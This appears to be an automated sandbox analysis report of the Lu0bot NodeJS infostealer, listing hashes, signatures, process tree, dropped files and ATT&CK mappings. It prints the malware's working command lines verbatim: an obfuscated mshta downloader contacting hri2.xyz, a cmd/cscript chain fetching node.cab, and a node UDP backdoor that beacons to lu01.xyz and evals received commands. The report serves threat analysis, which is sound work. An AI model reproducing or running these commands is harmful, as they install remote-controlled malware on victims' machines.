lu0bot | 5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f

General

Target

euthree_20210608-233519.exe
Size

2KB
MD5

cd17d11bb2c8dd9942e816677df2dae2
SHA1

140fbc4ec7fd4be8c66dd38d6836473726fa7c1b
SHA256

5a2264e42206d968cbcfff583853a0e0d4250f078a5e59b77b8def16a6902e3f
SHA512

31180403ffbe4a2c2144bab8a93aed6d64c85a2c6658b44e8ee7cf8bc1a0e530de4141c0e685826f79457e396bb3d70a25c87ce30a142b481fc9bde0b93c6762

Score

10^/10

lu0bot stealer trojan

Malware Config

Signatures

Lu0bot
Lu0bot is a lightweight infostealer written in NodeJS.
trojan stealer lu0bot
Blocklisted process makes network request 2 IoCs

Processes:

mshta.execscript.exe

flow pid process

3 2024 mshta.exe
4 1344 cscript.exe
Executes dropped EXE 1 IoCs

Processes:

node.exe

pid process

1016 node.exe
Loads dropped DLL 1 IoCs

Processes:

cscript.exe

pid process

1480 cscript.exe

flow	pid	process
3	2024	mshta.exe
4	1344	cscript.exe

pid	process
1016	node.exe

pid	process
1480	cscript.exe

Drops file in Windows directory 2 IoCs

Processes:

expand.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

euthree_20210608-233519.exemshta.execmd.execscript.exe

description	pid	process	target process
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	mshta.exe
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	mshta.exe
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	mshta.exe
PID 1040 wrote to memory of 2024	1040	euthree_20210608-233519.exe	mshta.exe
PID 2024 wrote to memory of 1984	2024	mshta.exe	cmd.exe
PID 2024 wrote to memory of 1984	2024	mshta.exe	cmd.exe
PID 2024 wrote to memory of 1984	2024	mshta.exe	cmd.exe
PID 2024 wrote to memory of 1984	2024	mshta.exe	cmd.exe
PID 1984 wrote to memory of 1344	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1344	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1344	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1344	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 700	1984	cmd.exe	expand.exe
PID 1984 wrote to memory of 700	1984	cmd.exe	expand.exe
PID 1984 wrote to memory of 700	1984	cmd.exe	expand.exe
PID 1984 wrote to memory of 700	1984	cmd.exe	expand.exe
PID 1984 wrote to memory of 1480	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1480	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1480	1984	cmd.exe	cscript.exe
PID 1984 wrote to memory of 1480	1984	cmd.exe	cscript.exe
PID 1480 wrote to memory of 1016	1480	cscript.exe	node.exe
PID 1480 wrote to memory of 1016	1480	cscript.exe	node.exe
PID 1480 wrote to memory of 1016	1480	cscript.exe	node.exe
PID 1480 wrote to memory of 1016	1480	cscript.exe	node.exe

C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe
"C:\Users\Admin\AppData\Local\Temp\euthree_20210608-233519.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1040

C:\Windows\SysWOW64\mshta.exe
mshta "javascript:document.write();195;y=unescape('%339%7Eh%74t%70%3A%2F%2F%68r%692%2Ex%79z%2Fh%72i%2F%3F%32f%652%652%62%7E%326').split('~');150;try{x='WinHttp';35;x=new ActiveXObject(x+'.'+x+'Request.5.1');125;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);82;x.send();165;y='ipt.S';201;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);68;}catch(e){};129;;window.close();"
2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2024

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /d/s/c cd /d "C:\ProgramData" & mkdir "DNTException" & cd "DNTException" & dir /a node.exe || ( echo x=new ActiveXObject("WinHttp.WinHttpRequest.5.1"^);x.Open("GET",unescape(WScript.Arguments(0^)^),false^);x.Send(^);b=new ActiveXObject("ADODB.Stream"^);b.Type=1;b.Open(^);b.Write(x.ResponseBody^);b.SaveToFile(WScript.Arguments(1^),2^); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab & expand node.cab node.exe & del get1623232550443.txt node.cab ) & echo new ActiveXObject("WScript.Shell").Run(WScript.Arguments(0),0,false); > get1623232550443.txt & cscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))" & del get1623232550443.txt
3⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\cscript.exe
cscript /nologo /e:jscript get1623232550443.txt "http%3A%2F%2Fhri2.xyz%2Fhri%2F%3F26ece80b3%26b%3Da30f6953" node.cab
4⤵
- Blocklisted process makes network request
PID:1344

C:\Windows\SysWOW64\expand.exe
expand node.cab node.exe
4⤵
- Drops file in Windows directory
PID:700

C:\Windows\SysWOW64\cscript.exe
cscript /nologo /e:jscript get1623232550443.txt "node -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))"
4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1480

C:\ProgramData\DNTException\node.exe
"C:\ProgramData\DNTException\node.exe" -e eval(unescape('s=require(%27dgram%27).createSocket(%27udp4%27);s.on(%27error%27,function(e){});s.i=%276ece80b3%27;function%20f(b){if(!b)b=new%20Buffer(%27p%27);s.send(b,0,b.length,19584,%27lu01.xyz%27);s.send(b,0,b.length,19584,%27lu0.viewdns.net%27)};f();s.t=setInterval(f,10000);s.on(%27message%27,function(m,r){try{if(!m[0])return%20s.c(m.slice(1),r);for(var%20a=1;a<m.length;a++)m[a]^=a^m[0]^134;m[0]=32;eval(m.toString())}catch(e){}})'))
5⤵
- Executes dropped EXE
PID:1016

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\DNTException\get1623232550443.txt
MD5
52ec5ebd8a447b5115ce83e703bcde51

SHA1
38ce97f87c6be668d07985558fc89c53e27770a3

SHA256
ef1be6a77e480e683331052654d3db47a02fe4b7af3e35e67b9248e989307615

SHA512
9af71d426564ef92ff6de1d89107161c138bbdd9dc08b5e380a0b94e7b2e91ec4d498a1d8f4514552a45bf14a8f9078dc295aa1cb86cfc063427ad218e9d5f32

Download Submit
C:\ProgramData\DNTException\get1623232550443.txt
MD5
e15f82747d0884d61a5bc4fb2db7d29d

SHA1
aca478622586f17603fe56705fd319b75198b2b0

SHA256
982675d0465497986b3ece89f08f81a4629d975617671153e0ca653f2589966f

SHA512
d8c17e54cbefa72191c238f23d619a4637fd74c8c8b9975071bf5507c5a34259495cd20e516c7f7f0c215ec4f724b22de88b8a5ea43765c019eb067600cf661d

Download Submit
C:\ProgramData\DNTException\node.cab
MD5
c7ed3d9304a29c8b472174bd910be071

SHA1
22b7d55b80acd434c13b0a2d8c59b45c10220a42

SHA256
abbaffb1b56bd3c5db5aedf4bdc0794d82bedba43677d13cd1056cb5412b3441

SHA512
c65c80564019ae54145a939f9ed463895c337f020cbd769647dc6baf8db5db283a5e151c2ae4f10681d23db161d791ce59c395d8ebba603a27a2a6be0368a1a2

Download Submit
C:\ProgramData\DNTException\node.exe
MD5
11f0b4e17e686cdc46f85a6becede4a8

SHA1
2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

SHA256
6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

SHA512
11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

Download Submit
C:\ProgramData\DNTException\node.exe
MD5
11f0b4e17e686cdc46f85a6becede4a8

SHA1
2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

SHA256
6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

SHA512
11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

Download Submit
\ProgramData\DNTException\node.exe
MD5
11f0b4e17e686cdc46f85a6becede4a8

SHA1
2826f7ac33b43439ecddd08ad541a7f54a9eb7c0

SHA256
6a6ce9cbc42560a1d0ed9c04dcdcb84127f0c2e90d4850fd0e3003b31549795c

SHA512
11a321cc6685f854544a5228ae27cf311cf7ccc534be5255b4a6e6976c3d3c6ebe9d0873f8af0ad409d7893ea616754ebbf917e561d84bc22e81e030af4d084f

Download Submit
memory/700-64-0x0000000000000000-mapping.dmp

Download
memory/1016-77-0x0000000007C00000-0x0000000007C01000-memory.dmp

Filesize
4KB

Download
memory/1016-71-0x0000000000000000-mapping.dmp

Download
memory/1016-78-0x0000000035600000-0x0000000035601000-memory.dmp

Filesize
4KB

Download
memory/1016-76-0x000000000D500000-0x000000000D501000-memory.dmp

Filesize
4KB

Download
memory/1016-75-0x000000000D200000-0x000000000D201000-memory.dmp

Filesize
4KB

Download
memory/1016-74-0x000000000DB00000-0x000000000DB01000-memory.dmp

Filesize
4KB

Download
memory/1016-73-0x000000002D300000-0x000000002D301000-memory.dmp

Filesize
4KB

Download
memory/1344-61-0x0000000000000000-mapping.dmp

Download
memory/1344-63-0x0000000074F31000-0x0000000074F33000-memory.dmp

Filesize
8KB

Download
memory/1480-66-0x0000000000000000-mapping.dmp

Download
memory/1984-60-0x0000000000000000-mapping.dmp

Download
memory/2024-59-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads